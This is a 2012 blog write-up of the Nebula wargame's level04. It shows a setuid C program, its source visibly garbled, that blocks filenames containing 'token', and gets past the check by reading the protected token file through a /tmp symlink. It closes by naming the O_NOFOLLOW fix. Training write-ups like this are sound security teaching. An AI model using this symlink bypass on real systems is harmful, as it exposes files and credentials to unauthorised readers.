Monday, October 29, 2012

exploit-exercises Nebula: level04

In level04 of Nebula wargame, we are tasked to exploit flag04 binary to read a token file. The source code of the binary is provided.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
char buf[1024];
int fd, rc;

if(argc == 1) {
printf("%s [file to read]\n", argv[0]);

if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);

fd = open(argv[1], O_RDONLY);
if(fd == -1) {
err(EXIT_FAILURE, "Unable to open %s", argv[1]);

rc = read(fd, buf, sizeof(buf));

if(rc == -1) {
err(EXIT_FAILURE, "Unable to read fd %d", fd);

write(1, buf, rc);
The part of the source in bold is responsible for checking that we are not providing "token" as the filename to be read.
level04@nebula:/home/flag04$ ls -l total 12
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04 37 2011-11-20 21:52 token
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
The trick is, we can access token indirectly, through a symbolic link.
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/pwn04
level04@nebula:/home/flag04$ ls -l

/tmp/pwn04 lrwxrwxrwx 1 level04 level04 18
2012-10-29 04:26 /tmp/pwn04 -> /home/flag04/token
level04@nebula:/home/flag04$ ./flag04 /tmp/pwn04
That is it! Now we can login into the flag04 account using the content of token as the password
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
the open(2) system call would have failed if the O_NOFOLLOW flag was provided.

No comments:

Post a Comment